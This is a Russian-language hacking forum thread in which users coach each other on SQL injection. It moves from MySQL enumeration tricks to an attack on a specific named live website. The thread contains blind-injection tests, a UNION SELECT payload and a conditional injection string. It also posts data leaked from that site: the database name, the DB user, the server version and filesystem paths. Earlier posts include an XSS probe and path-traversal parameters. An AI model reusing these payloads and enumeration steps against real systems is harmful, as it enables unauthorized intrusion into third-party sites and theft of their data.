Я ненавижу лето из-за таких вопросов. 1. SQL-инъекции и PROCEDURE ANALYSE() (c) Raz0r. Но работает реально редко. 2. Бруть. 3. Только в 5 и выше версии mysql, есть information_schema. 4. Удали свой аккаунт с античата.
Блин, мне уже до неприличия надоело задавать нубские вопросы. Сам не догоняю (( На запрос: /index.php?axn=1' вылазит на запрос: /index.php?do=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&name=1&[email protected]&p=1&axn=1&query=1 (это уже из сканера) выдает Внимание, вопрос)) Уязвим? И еще. На запрос www.site.com/admin/ вылазит не админка, а какой то код на всю страницу (100500 скролов) Вот кусочек:
/index.php?name=../index.php&p=../index.php&axn=1&query=../index.php А вообще есть способ ещё один, по кол-ву вопросов в этой теме, который некто незнает. Наз-ся вывод через ошибку ****...
EoGeneo,DrakonSerg.... "Господа, задающие вопросы: хватит ПИСАТЬ, попробуйте сначала хоть что-то ЧИТАТЬ !!!" (с) Jokester
где почитать, уважаемый? Я кроме инфы, что нужно выводить через юнион селект или ордер би инфы не нашел. Я бы с удовольствием сам бы поучился, но хз где учиться
Ладно вопрос по другому поствлю. GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд. Какой запрос используется для получения списка в 4 ветке мускула.
О МАЙ ГАД Ты непобедим! Кури маны, чо такое group_concat(). Если следовать твоей логике, то concat_ws специально mysql разработчики сделали для хакеров, ну мол там user(),database(),version() выводить одним запросом, а так же юзеров, пассы и т.п. Извеняюсь забыл ещё.
спусти тормозную жидкость...почитай ман по скулям... не раз уже тыкали носом в ман, неужели не хватает смелости все таки почитать что нибудь оттуда? тебе же сказали что информационная схема есть только в 5 версии мускула, а в 4 надо подбирать брутом..для этого есть куча утилит.. гугл тебе в помощь
привет команде; http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения я пробовал много методов, но никакого результата Как можно "inject" этот сайт
Дак попробуй написать http://beinoma.com/details.php?prodid=974+and+1=1-- если отобразит http://beinoma.com/details.php?prodid=974+and+1=2-- не отобразит, то крути как слепую.
молчал бы горе хакер...я утром тебе рекомендовал читать маны..так вот читай и не пости глупости, если ошибки нет это еще не значит что иньекции нет.. http://beinoma.com/details.php?prodid=547&cid=1' Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/p14tnu81/public_html/details.php on line 57 http://beinoma.com/details.php?prodid=547&cid=1+union+select+1,2,3,4,5--
Code: http://beinoma.com/details.php?prodid=547&cid=if((select+substring(version(),1,1)=5),1,(select+1+union+select+2)) POST=y @@basedir: / @@tmpdir: /tmp/ database(): p14tnu81_beipoa @@datadir: /var/lib/mysql/ version(): 5.0.67-community @@version_compile_os: redhat-linux-gnu user(): p14tnu81@localhost
вы дяденька зря сердитесь на человека.... и вообще вы можете отличать параметр prodid от параметра сid? автор указал именно параметр prodid
никто ни на кого не сердится...солдат ребенка не обидит как говорится.. и причем здесь параметр пропид или сид? разговор шел о скуле..нате вам скулю...а пашкела вам на блюдечке предоставил... P.S. с отличалкой у меня пока все нормально... P.S.2 и к чему ваш пост написан совсем непонятно...
Кстати да. задачи найти скулю на сайте небыло. Был указан определенный параметр - собственно в нем и искали.
